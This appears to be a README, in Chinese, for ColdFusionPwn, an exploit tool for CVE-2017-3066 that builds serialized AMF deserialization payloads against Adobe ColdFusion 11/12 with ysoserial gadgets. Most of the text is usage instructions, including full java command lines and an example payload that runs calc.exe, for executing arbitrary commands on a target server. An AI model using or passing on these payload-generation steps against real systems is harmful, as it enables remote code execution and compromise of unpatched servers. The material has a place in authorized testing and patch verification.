针对 Adobe ColdFusion 11/12 的 CVE-2017-3066 利用工具。
该工具允许您生成序列化的 AMF 载荷,以利用对允许类的输入验证缺失漏洞。 详情请参阅我们的博客文章。
获取最新版本的 ysoserial。 从发布页面获取 ColdFusionPwn。
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) 或 Externalizable (CF11/12) 利用技术
- [payload type] ysoserial gadget 载荷
- [command] 要执行的命令
- [outfile] 生成载荷的输出文件
必须将 ColdFusionPwn-0.0.1-SNAPSHOT-all.jar 作为类路径中的第一个条目,因为 ysoserial 自带的 Apache Commons BeanUtils 库版本较新(且具有不同的 serialversion uid)。
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf